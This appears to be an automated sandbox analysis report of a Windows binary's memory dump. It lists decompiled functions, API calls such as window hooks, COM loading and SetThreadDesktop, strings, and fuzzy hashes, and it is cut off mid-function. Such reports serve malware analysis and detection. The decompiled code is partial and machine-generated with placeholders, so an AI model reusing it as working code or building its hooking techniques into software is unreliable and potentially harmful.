Function 00C77E6C, Relevance: 10.6, APIs: 7, Instructions: 64
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00C77E6C(void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
				char _v24;
				int _t12;
				char* _t35;
				void* _t60;
				char* _t62;
				void* _t68;

				_t35 = _t62;
				 *((long long*)(_t35 + 8)) = __rbx;
				 *((long long*)(_t35 + 0x10)) = __rbp;
				 *((long long*)(_t35 + 0x18)) = __rsi;
				 *((long long*)(_t35 + 0x20)) = __rdi;
				_t68 = __rdx;
				_t60 = __r8;
				_t24 = 0x27;
				E00C77E18(_t35 - 0x18, __rcx, __r8);
				_t12 = E00C77F50(r9d, _t35, __rbx,  &_v24, __rcx, __rsi, __r8);
				if(_t35 != 0) {
					if(__rdx != 0) {
						_t24 = 0x27 + lstrlenA();
					}
					if(_t60 != 0) {
						_t24 = _t24 + lstrlenA();
					}
					r8d = _t24;
					HeapAlloc(??, ??, ??);
					if(_t35 != 0) {
						 *_t35 = 0;
						if(_t68 != 0) {
							lstrcpyA();
						}
						lstrcatA();
						if(_t60 != 0) {
							lstrcatA();
						}
					}
					_t12 = HeapFree();
				}
				return _t12;
			}

0x00c77e6c
0x00c77e6f
0x00c77e73
0x00c77e77
0x00c77e7b
0x00c77e85
0x00c77e8e
0x00c77e95
0x00c77e9c
0x00c77ea8
0x00c77eb3
0x00c77eb8
0x00c77ec3
0x00c77ec3
0x00c77ec8
0x00c77ed3
0x00c77ed3
0x00c77ede
0x00c77ee1
0x00c77eed
0x00c77eef
0x00c77ef5
0x00c77efd
0x00c77efd
0x00c77f09
0x00c77f12
0x00c77f1a
0x00c77f1a
0x00c77f12
0x00c77f2c
0x00c77f2c
0x00c77f4f

APIs

Part of subcall function 00C77F50: HeapAlloc.KERNEL32(?,?,?,?,?,?,00000000,00C77EAD,?,?,?,?,00000000,00C78917), ref: 00C77F76
Part of subcall function 00C77F50: wsprintfA.USER32 ref: 00C78046

lstrlenA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EBD
lstrlenA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77ECD
HeapAlloc.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EE1
lstrcpyA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EFD
lstrcatA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F09
lstrcatA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F1A
HeapFree.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F2C

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$Alloclstrcatlstrlen$Freelstrcpywsprintf
String ID:
API String ID: 4068783096-0
Opcode ID: c8519489772c52442ece45d07fcdd414d080b8d25fb7c524eaf107ad070c8715
Instruction ID: 0b18eceb37eafa4d94421795bf7c079e966ccfb3d95db84cd380c996336eda1b
Opcode Fuzzy Hash: c8519489772c52442ece45d07fcdd414d080b8d25fb7c524eaf107ad070c8715
Instruction Fuzzy Hash: 2C21B436704B4085EB259F22E94472AA761BB88FD0F8DC220DE0D07B24DF3CC9468344

Uniqueness

Uniqueness Score: -1.00%

Function 00C783FC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00C783FC(void* __ecx, void* __edx, void* __esi, long long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __rbp, void* __r8, void* __r9, long long _a8, long long _a16, void* _a40, long long _a48) {
				char _v24;
				void* _t17;
				void* _t18;
				void* _t25;
				long long* _t28;
				void* _t44;
				void* _t52;

				_t52 = __r8;
				_t29 = __rbx;
				_t28 = __rax;
				_t25 = __edx;
				_a8 = __rbx;
				_a16 = __rsi;
				_t44 = __rdx;
				if( *0xc95820 != 0) {
					if(__rdx == 0 || _a48 == 0) {
						_t18 = 0x80070057;
					} else {
						if(( *(__rcx + 0x10) & 0x00000002) == 0) {
							if(( *(__rcx + 0x10) & 0x00000001) == 0) {
								L8:
								E00C784F4(_t25, _t29, _t44,  &_v24, _t52);
								if(_t28 != 0) {
									L12:
									GetProcAddress();
									if(_t28 == 0) {
										_t18 = 0x800401f9;
									} else {
										_t18 =  *_t28();
									}
									L16:
									return _t18;
								}
								GetModuleHandleW();
								if(_t28 != 0) {
									goto L12;
								}
								LoadLibraryW();
								if(_t28 != 0) {
									goto L12;
								}
								_t18 = 0x800401f8;
								goto L16;
							}
							EnterCriticalSection();
							E00C78398(_t17, __rbx, __rdx, __rcx, __rbp);
							_t29 = _t28;
							LeaveCriticalSection(??);
							if(_t28 == 0) {
								goto L5;
							}
							goto L8;
						}
						L5:
						_t18 = 0x80040154;
					}
					goto L16;
				}
				_t18 = 0x8001010f;
				goto L16;
			}

0x00c783fc
0x00c783fc
0x00c783fc
0x00c783fc
0x00c783fc
0x00c78401
0x00c78412
0x00c78418
0x00c78427
0x00c784dd
0x00c78439
0x00c7843d
0x00c7844d
0x00c78479
0x00c78481
0x00c78489
0x00c784b0
0x00c784ba
0x00c784c3
0x00c784d6
0x00c784c5
0x00c784d2
0x00c784d2
0x00c784e2
0x00c784f1
0x00c784f1
0x00c7848f
0x00c78498
0x00000000
0x00000000
0x00c7849e
0x00c784a7
0x00000000
0x00000000
0x00c784a9
0x00000000
0x00c784a9
0x00c78456
0x00c7845f
0x00c7846b
0x00c7846e
0x00c78477
0x00000000
0x00000000
0x00000000
0x00c78477
0x00c7843f
0x00c7843f
0x00c7843f
0x00000000
0x00c78427
0x00c7841a
0x00000000

Strings

DllGetClassObject, xrefs: 00C784B0

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: DllGetClassObject
API String ID: 0-1075368562
Opcode ID: 9d08b2cd46e27036f387f794faf523c5aaf47936fa1e0ecef0b645d30eca8681
Instruction ID: 3c37fd5755285eac951d81a678d9d064f6368c5e293baf63bfa658557b65b8d6
Opcode Fuzzy Hash: 9d08b2cd46e27036f387f794faf523c5aaf47936fa1e0ecef0b645d30eca8681
Instruction Fuzzy Hash: 55219521385B4282EE258705E52C7295790B784BC8F68C529EF5E07B74DFBCC54DC744

Uniqueness

Uniqueness Score: -1.00%

Function 00C7C2F8, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetWindowInfo.USER32 ref: 00C7C318
PtInRect.USER32 ref: 00C7C326
GetWindow.USER32 ref: 00C7C361
GetWindow.USER32 ref: 00C7C36F
GetWindow.USER32 ref: 00C7C388

Strings

<, xrefs: 00C7C30D

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$InfoRect
String ID: <
API String ID: 689018761-4251816714
Opcode ID: 4a73d7d1cdc3c76b845095d37598cff86def0ee694c5e51e0da120284745aefe
Instruction ID: 7efd408702ea7365b89ec57dc8282ac16b57432c4b82b6ba33712edceee52508
Opcode Fuzzy Hash: 4a73d7d1cdc3c76b845095d37598cff86def0ee694c5e51e0da120284745aefe
Instruction Fuzzy Hash: 6F1130322046418BEB24DF26E69476EB3A0F789B84F54C128EA5E47B58DF3CC554CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C64E28, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00C64E4F
GetProcAddress.KERNEL32 ref: 00C64E5F
OpenProcess.KERNEL32 ref: 00C64E7F
CloseHandle.KERNEL32 ref: 00C64EAD

Strings

IsWow64Process, xrefs: 00C64E58
KERNEL32.DLL, xrefs: 00C64E48

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Handle$AddressCloseModuleOpenProcProcess
String ID: IsWow64Process$KERNEL32.DLL
API String ID: 4274107956-1193389583
Opcode ID: 434b8af0983253bbef5f31948a8af9820ff804dbdceb49331d61c99ac6c5cda3
Instruction ID: ee76dda234e3aa05f02979f08d8dcc8346eecd65449290c5977981b86278fce5
Opcode Fuzzy Hash: 434b8af0983253bbef5f31948a8af9820ff804dbdceb49331d61c99ac6c5cda3
Instruction Fuzzy Hash: 19019E35211F0187FF298F15F850725B2A1FB89B90F888228DE1A07B68EF3EC9488744

Uniqueness

Uniqueness Score: -1.00%

Function 00C77408, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 29stringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32 ref: 00C77426
lstrcatA.KERNEL32 ref: 00C77438
lstrcatA.KERNEL32 ref: 00C7744E
OpenEventA.KERNEL32 ref: 00C7745E
CloseHandle.KERNEL32 ref: 00C77471

Strings

OPR, xrefs: 00C77418

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$CloseEventHandleOpenlstrcpy
String ID: OPR
API String ID: 821562950-3143204451
Opcode ID: 567e6f599c3d98e3b7a68c3eda35bd34e5395db6b9f5b84365a85f538e4331ee
Instruction ID: 731d0eae0d16b9decd10739d47742ea9a65cab1ac6c3ac17b98a660123432e4e
Opcode Fuzzy Hash: 567e6f599c3d98e3b7a68c3eda35bd34e5395db6b9f5b84365a85f538e4331ee
Instruction Fuzzy Hash: BE01447230494692FF218B14F85479A7361FB88B88F84C222964E07974DF3CC54DC744

Uniqueness

Uniqueness Score: -1.00%

Function 00C698D0, Relevance: 9.1, APIs: 6, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E00C698D0(void* __ecx, long long __rbx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, intOrPtr* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				char _v31;
				short _v33;
				char _v37;
				char _v38;
				char _v40;
				long _t34;
				char _t36;
				void* _t39;
				signed char _t41;
				signed int _t42;
				signed int _t43;
				void* _t44;
				signed int _t67;
				long long _t70;
				intOrPtr _t77;
				long long _t93;
				intOrPtr* _t95;
				void* _t99;
				long long _t101;
				void* _t106;
				void* _t109;
				void* _t114;
				intOrPtr _t116;
				intOrPtr _t119;

				_t109 = __r9;
				_t85 = __rdx;
				_t73 = __rbx;
				_t70 = _t101;
				 *((long long*)(_t70 + 8)) = __rbx;
				 *((long long*)(_t70 + 0x10)) = __rbp;
				 *((long long*)(_t70 + 0x18)) = __rsi;
				 *((long long*)(_t70 + 0x20)) = __rdi;
				_push(_t114);
				_t95 = __r8;
				_t99 = __rdx;
				r14d = __ecx;
				if(__ecx != 0 || __r8 == 0) {
					L27:
					__eflags = 0;
					_t34 = CallNextHookEx(??, ??, ??, ??);
					goto L28;
				} else {
					r12d =  *((intOrPtr*)(__r8 + 0x10));
					_t93 =  *((intOrPtr*)(__r8 + 0x18));
					_t119 =  *0xc95760; // 0x0
					_v40 =  *"/0" & 0x0000ffff;
					_t36 =  *0xc89b9e; // 0x0
					_v38 = _t36;
					_v37 = 0;
					_v33 = 0;
					_v31 = 0;
					_t39 = r12d - 1;
					if(_t39 == 0) {
						_t116 =  *__r8;
						r8d = 0xa;
						GetClassNameA(??, ??, ??);
						_t41 = E00C7BCD8(__rbx,  &_v40, _t93, __r8, __rdx);
						__eflags = _t41 & 0x00000040;
						if((_t41 & 0x00000040) != 0) {
							__eflags =  *(_t116 + 0x30) & 0x80cf0000;
							if(( *(_t116 + 0x30) & 0x80cf0000) != 0) {
								_t42 =  *(_t116 + 0x48);
								__eflags = 0x00080000 & _t42;
								if((0x00080000 & _t42) == 0) {
									_t43 = _t42 | 0x00080000;
									__eflags = _t43;
									 *(_t116 + 0x48) = _t43;
								}
							}
						}
						_t106 = _t99;
						_t34 = CallNextHookEx(??, ??, ??, ??);
						__eflags = _t70;
						if(__eflags == 0) {
							_t77 =  *0xc95760; // 0x0
							_t34 = E00C69814(0, __eflags, _t70, _t77, _t93, _t106);
						}
						L26:
						L28:
						return _t34;
					}
					_t44 = _t39 - 0x13;
					if(_t44 == 0) {
						__eflags =  *0xc95768; // 0x0
						if(__eflags == 0) {
							L17:
							_t70 =  *0xc95730; // 0x0
							__eflags = _t70;
							if(_t70 == 0) {
								goto L27;
							}
							__eflags = r12d -  *((intOrPtr*)(_t70 + 0x150));
							if(r12d !=  *((intOrPtr*)(_t70 + 0x150))) {
								goto L27;
							}
							E00C68F68(_t70, _t73, _t93, _t99, _t95, _t109);
							L15:
							_t34 = E00C7BF00();
							__eflags = _t34;
							if(_t34 != 0) {
								__imp__SetWindowLongPtrA();
							}
							goto L26;
						}
						__eflags = _t93 -  *((intOrPtr*)(_t119 + 0x118));
						if(_t93 ==  *((intOrPtr*)(_t119 + 0x118))) {
							L14:
							E00C68ED4(_t70, _t85);
							goto L15;
						}
						__eflags = _t93 -  *((intOrPtr*)(_t119 + 0x110));
						if(_t93 !=  *((intOrPtr*)(_t119 + 0x110))) {
							goto L17;
						}
						goto L14;
					}
					if(_t44 != 0x72 || __rdx == 0 || E00C7A6C4() != 0) {
						goto L17;
					} else {
						_t67 =  *0xc95768; // 0x0
						if(_t67 != 0) {
							goto L17;
						} else {
							r8d = _t114 + 0xa;
							GetClassNameA(??, ??, ??);
							_t34 = E00C7BF00();
							if(_t34 != 0) {
								r8d = 0;
								__imp__SetWindowLongPtrA();
							}
							goto L28;
						}
					}
				}
			}

0x00c698d0
0x00c698d0
0x00c698d0
0x00c698d0
0x00c698d3
0x00c698d7
0x00c698db
0x00c698df
0x00c698e5
0x00c698ef
0x00c698f2
0x00c698f5
0x00c698fa
0x00c69aa0
0x00c69aa9
0x00c69aab
0x00000000
0x00c69909
0x00c69910
0x00c69914
0x00c69918
0x00c6991f
0x00c69924
0x00c6992a
0x00c69930
0x00c69934
0x00c69939
0x00c69940
0x00c69943
0x00c69a2b
0x00c69a33
0x00c69a3c
0x00c69a4e
0x00c69a53
0x00c69a55
0x00c69a57
0x00c69a5f
0x00c69a61
0x00c69a6a
0x00c69a6c
0x00c69a6e
0x00c69a6e
0x00c69a70
0x00c69a70
0x00c69a6c
0x00c69a5f
0x00c69a77
0x00c69a7e
0x00c69a87
0x00c69a8a
0x00c69a8c
0x00c69a96
0x00c69a96
0x00c69a9b
0x00c69ab1
0x00c69acf
0x00c69acf
0x00c69949
0x00c6994c
0x00c699b1
0x00c699b7
0x00c699fe
0x00c699fe
0x00c69a05
0x00c69a08
0x00000000
0x00000000
0x00c69a0e
0x00c69a15
0x00000000
0x00000000
0x00c69a24
0x00c699d3
0x00c699d9
0x00c699de
0x00c699e0
0x00c699ee
0x00c699f4
0x00000000
0x00c699e0
0x00c699b9
0x00c699c0
0x00c699cb
0x00c699ce
0x00000000
0x00c699ce
0x00c699c2
0x00c699c9
0x00000000
0x00000000
0x00000000
0x00c699c9
0x00c69951
0x00000000
0x00c6996d
0x00c6996d
0x00c69973
0x00000000
0x00c69979
0x00c69979
0x00c69985
0x00c6998e
0x00c69995
0x00c69997
0x00c6999f
0x00c699a5
0x00000000
0x00c699a9
0x00c69973
0x00c69951

APIs

SetWindowLongPtrA.USER32 ref: 00C6999F
GetClassNameA.USER32 ref: 00C69985

Part of subcall function 00C7BF00: GetClassNameA.USER32 ref: 00C7BF36
Part of subcall function 00C7BF00: lstrcmpiA.KERNEL32(?,?,?,?,00000000,00C699DE), ref: 00C7BF4C

SetWindowLongPtrA.USER32 ref: 00C699EE
GetClassNameA.USER32 ref: 00C69A3C
CallNextHookEx.USER32 ref: 00C69A7E
CallNextHookEx.USER32 ref: 00C69AAB

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ClassName$CallHookLongNextWindow$lstrcmpi
String ID:
API String ID: 1853066352-0
Opcode ID: 729799f8ab8c0cee888293cf45e2c5de64efade555db66f4cce609378a8f80ed
Instruction ID: 3c1a77a1570249f042079a17dafa48438278e807d9aac8c37acc0b058ca2c426
Opcode Fuzzy Hash: 729799f8ab8c0cee888293cf45e2c5de64efade555db66f4cce609378a8f80ed
Instruction Fuzzy Hash: DD41F23521475082EB34DFA69984779B3A5F749BC0F48822ADE1E83B69EF38CA45C701

Uniqueness

Uniqueness Score: -1.00%

Function 00C83848, Relevance: 9.1, APIs: 6, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00C83871
DefWindowProcA.USER32 ref: 00C838BA
KillTimer.USER32 ref: 00C838E6
KillTimer.USER32 ref: 00C838F4
DeleteObject.GDI32 ref: 00C83906
SetWindowLongPtrA.USER32 ref: 00C83919

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$KillLongTimer$DeleteObjectProc
String ID:
API String ID: 209327671-0
Opcode ID: fe36ff5e4f342783de0cd3178f3c10fb3d51a000140d2ee29ebfd44a83132c97
Instruction ID: 287b40f4e00b2fbed615c18b2c57a9d6ecb0cfba7edb4382ecc9768a0eb7d126
Opcode Fuzzy Hash: fe36ff5e4f342783de0cd3178f3c10fb3d51a000140d2ee29ebfd44a83132c97
Instruction Fuzzy Hash: 39118725304AC081E919AB27A814735A750A786FE4F68A125DD7B07F64CE79C74A830C

Uniqueness

Uniqueness Score: -1.00%

Function 00C6250C, Relevance: 9.1, APIs: 6, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00C6250C(void* __edx, void* __ebp, long long __rax, long long __rbx, intOrPtr __rcx, void* __rsi, void* __rbp, void* __r9, long long _a8) {
				signed int _t29;
				long long _t51;
				long long _t52;
				void* _t59;
				void* _t60;

				_t60 = __rbp;
				_t59 = __rsi;
				_t54 = __rcx;
				_t52 = __rbx;
				_t51 = __rax;
				_a8 = __rbx;
				 *0xc95688 = __rcx;
				_t29 = 0;
				GetModuleHandleA(??);
				 *0xc95680 = __rax;
				if((dil & 0x00000001) != 0) {
					 *0xc95674 = GetVersion();
				}
				if((dil & 0x00000002) != 0) {
					 *0xc95670 = GetCurrentProcessId();
				}
				if((dil & 0x00000004) == 0) {
					L6:
					if((dil & 0x00000008) == 0) {
						L9:
						if((dil & 0x00000010) != 0) {
							r9d = 0;
							r8d = 0;
							CreateEventA(??, ??, ??, ??);
							 *0xc956a0 = _t51;
							if(_t51 == 0) {
								_t29 = GetLastError();
							}
						}
						if(_t29 == 0) {
							goto L14;
						} else {
							goto L13;
						}
					}
					_t29 = 0 | E00C64588(_t51, _t52, _t54, 0xc95690, _t59, _t60) != 0x00000000;
					if(_t29 != 0) {
						goto L13;
					}
					_t14 = _t52 + 0x5c; // 0x5c
					r8d = _t14;
					__imp__StrRChrA();
					_t51 = _t51 + 1;
					 *0xc956a8 = _t51;
					 *0xc9567c = E00C6A6B4(_t51, _t52, _t51);
					goto L9;
				} else {
					_t54 =  *0xc95688; // 0xc60000
					_t29 = _t29 & 0xffffff00 | E00C64588(_t51, _t52, _t54, 0xc95698, _t59, _t60) != 0x00000000;
					if(_t29 != 0) {
						L13:
						E00C62604();
						L14:
						return _t29;
					}
					goto L6;
				}
			}

0x00c6250c
0x00c6250c
0x00c6250c
0x00c6250c
0x00c6250c
0x00c6250c
0x00c62516
0x00c62521
0x00c62523
0x00c62529
0x00c62534
0x00c6253c
0x00c6253c
0x00c62546
0x00c6254e
0x00c6254e
0x00c62558
0x00c62576
0x00c6257a
0x00c625c0
0x00c625c4
0x00c625c6
0x00c625c9
0x00c625d2
0x00c625d8
0x00c625e2
0x00c625ea
0x00c625ea
0x00c625e2
0x00c625ee
0x00000000
0x00000000
0x00000000
0x00000000
0x00c625ee
0x00c6258e
0x00c62593
0x00000000
0x00000000
0x00c6259c
0x00c6259c
0x00c625a2
0x00c625a8
0x00c625ae
0x00c625ba
0x00000000
0x00c6255a
0x00c6255a
0x00c6256f
0x00c62574
0x00c625f0
0x00c625f0
0x00c625f5
0x00c62601
0x00c62601
0x00000000
0x00c62574

APIs

GetModuleHandleA.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C62523
GetVersion.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C62536
GetCurrentProcessId.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C62548
StrRChrA.SHLWAPI(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C625A2
CreateEventA.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C625D2
GetLastError.KERNEL32(?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C625E4

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateCurrentErrorEventHandleLastModuleProcessVersion
String ID:
API String ID: 3503360540-0
Opcode ID: f16d1539bd2f65609fe003e990ee71d11e921794c29bf74a6617c6d839d2ad31
Instruction ID: 828273df56dcda8392aef3d5ec09f1d63550d1532c20dd54e6dc90de89d51b3b
Opcode Fuzzy Hash: f16d1539bd2f65609fe003e990ee71d11e921794c29bf74a6617c6d839d2ad31
Instruction Fuzzy Hash: 0A217571201F038AFB369F79FCEAB1A3264BB44710FC58239AA1A46765EF38C559D700

Uniqueness

Uniqueness Score: -1.00%

Function 00C7D428, Relevance: 9.0, APIs: 6, Instructions: 49synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D43E
CreateEventA.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D45A
CreateThread.KERNEL32 ref: 00C7D483
GetLastError.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D495
CloseHandle.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D4AD
CloseHandle.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D4C7

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Create$CloseHandle$ErrorEventLastMutexThread
String ID:
API String ID: 2796074661-0
Opcode ID: 7f7d18922b67cf37d871a0349ed0942a426468429fe259270f0e0cbab4677944
Instruction ID: e9df9e1907678fe059c6ae4e54af6372a8fff2b275655396bb228520b283bd5b
Opcode Fuzzy Hash: 7f7d18922b67cf37d871a0349ed0942a426468429fe259270f0e0cbab4677944
Instruction Fuzzy Hash: B1115E33619F8182FB25CF75E41176A62A1EF84B58F5882398E5E4AA14DF3DD054CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00C77C68, Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 44memorystringCOMMON

Download Yara Rule

APIs

_strnicmp.NTDLL ref: 00C77C9E
lstrlenA.KERNEL32(?,?,?,00C658F8), ref: 00C77CAA
HeapAlloc.KERNEL32(?,?,?,00C658F8), ref: 00C77CC7
SetLastError.KERNEL32(?,?,?,00C658F8), ref: 00C77CD8
wsprintfA.USER32 ref: 00C77CF2

Strings

%s_%s, xrefs: 00C77CE5

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocErrorHeapLast_strnicmplstrlenwsprintf
String ID: %s_%s
API String ID: 2400951762-4036411895
Opcode ID: 23ee21b05c7748051f9f1d50e02058e86550211944fd45476bbf73ee0ced23dd
Instruction ID: 30b83018f9ffc7223134b25dd64051e1be3c065e58453ce2a0c6010a80d538fc
Opcode Fuzzy Hash: 23ee21b05c7748051f9f1d50e02058e86550211944fd45476bbf73ee0ced23dd
Instruction Fuzzy Hash: 070180A5705B8185EB14CF17E9087597361FB88FC4F98C131DE5A47B24EF39D6468704

Uniqueness

Uniqueness Score: -1.00%

Function 00C6A150, Relevance: 9.0, APIs: 6, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00C687B1,?,?,?,?,00C6214C), ref: 00C6A161
LeaveCriticalSection.KERNEL32(?,?,?,00C687B1,?,?,?,?,00C6214C), ref: 00C6A185
SetWindowLongPtrA.USER32 ref: 00C6A1A0
HeapFree.KERNEL32(?,?,?,00C687B1,?,?,?,?,00C6214C), ref: 00C6A1B9
EnterCriticalSection.KERNEL32(?,?,?,00C687B1,?,?,?,?,00C6214C), ref: 00C6A1C6
LeaveCriticalSection.KERNEL32(?,?,?,00C687B1,?,?,?,?,00C6214C), ref: 00C6A1DF

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$FreeHeapLongWindow
String ID:
API String ID: 1749895167-0
Opcode ID: 5a84ace84734c5070f8dd0e96ef9f7c20d59b1d3efb949e0b72890693804090f
Instruction ID: 808d002acd683046abb22b53f0cbc32e624374dbecd0e245af4f26f6279513f1
Opcode Fuzzy Hash: 5a84ace84734c5070f8dd0e96ef9f7c20d59b1d3efb949e0b72890693804090f
Instruction Fuzzy Hash: 7311F372611E45C2FB11CF25E898BAC3320F788F69F958212D90E43664CF38C98AC714

Uniqueness

Uniqueness Score: -1.00%

Function 00C83940, Relevance: 9.0, APIs: 6, Instructions: 37
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00C83940(void* __ecx, void* __edx, void* __eflags, void* __rax, void* __rcx, void* __rsi, void* __r8, void* __r9) {
				void* _v56;
				void* __rbx;
				int _t14;
				void* _t15;
				void* _t27;
				void* _t28;

				_t27 = __rax;
				_t28 = __rcx;
				SetThreadDesktop(??);
